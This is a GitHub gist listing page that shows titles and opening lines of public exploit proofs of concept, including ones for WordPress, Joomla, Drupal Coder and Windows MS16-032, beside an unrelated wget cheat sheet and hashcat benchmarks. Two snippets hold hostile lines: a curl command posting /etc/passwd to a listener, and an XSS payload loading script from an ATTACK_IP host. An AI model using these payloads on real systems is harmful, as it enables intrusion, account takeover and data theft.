Skip to content

Instantly share code, notes, and snippets.

View CCrashBandicot's full-sized avatar
🎯
Focusing

Amine Bendouil CCrashBandicot

🎯
Focusing
103 followers · 148 following
View GitHub Profile
@leonjza
leonjza / inject.py
Last active February 4, 2024 07:47
Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# 2017 - @leonjza
#
# Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
# Full bug description: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
# Usage example:
#
# List available posts:
#
# $ python inject.py http://localhost:8070/
@Grebenschikov
Grebenschikov / exploit.php
Last active January 2, 2017 10:54
Joomla 3.4.4 - 3.6.3 exploit for CVE-2016-8869 and CVE-2016-8870
<?php
/*
* Author: Alexander Grebenschikov <me@package.su>
* Versions: 3.4.4 through 3.6.3
* Exploit type: Account Creation, Elevated Privileges
* CVE Number: CVE-2016-8869, CVE-2016-8870
* Fixed Date: 2016-October-25
*/
@Dammmien
Dammmien / wget.sh
Last active March 13, 2024 13:58
wget cheat sheet
# POST a JSON file and redirect output to stdout
wget -q -O - --header="Content-Type:application/json" --post-file=foo.json http://127.0.0.1
# Download a complete website
wget -m -r -linf -k -p -q -E -e robots=off http://127.0.0.1
# But it may be sufficient
wget -mpk http://127.0.0.1
# Download all images of a website
@Raz0r
Raz0r / drupal-coder-rce.php
Created July 22, 2016 15:12
SA-CONTRIB-2016-039
<?php
# Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)
# https://www.drupal.org/node/2765575
# by Raz0r (http://raz0r.name)
$cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd";
$host = "http://localhost:81/drupal-7.12/";
$a = array(
@eyecatchup
eyecatchup / mr.robot_season-2_easter-egg-sites.md
Last active April 4, 2024 10:39
A collection of "Mr. Robot" Season 2 Easter Egg Sites. #mrrobot #hackingrobot #robotegg
@benichmt1
benichmt1 / MS16-032.ps1
Last active March 1, 2021 19:39
function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo) and @Fuzzysec for the original PS script.
Modifications by Mike Benich (@benichmt1).
Targets:
@epixoip
epixoip / 8x1080.md
Last active March 20, 2024 17:14
8x Nvidia GTX 1080 Hashcat Benchmarks
@MuhammetDilmac
MuhammetDilmac / joomla_admin_add.js
Created May 31, 2016 18:02
Joomla admin panel admin ekleme XSS scripti
/*
* Author: Gökmen Güreşçi & Muhammet Dilmaç
* Saldırı payloadı
* <script>var script = document.createElement('script');script.src = "http://ATTACK_IP/attack.js";document.getElementsByTagName('head')[0].appendChild(script);</script>
*/
var request = new XMLHttpRequest();
var req = new XMLHttpRequest();
var id = '';
var boundary = Math.random().toString().substr(2);
@cure53
cure53 / wordpress2.md
Last active January 8, 2021 17:55
WordPress SOME bug in plupload.flash.swf
@cure53
cure53 / wordpress.md
Last active February 1, 2023 22:47
WordPress Flash XSS in flashmediaelement.swf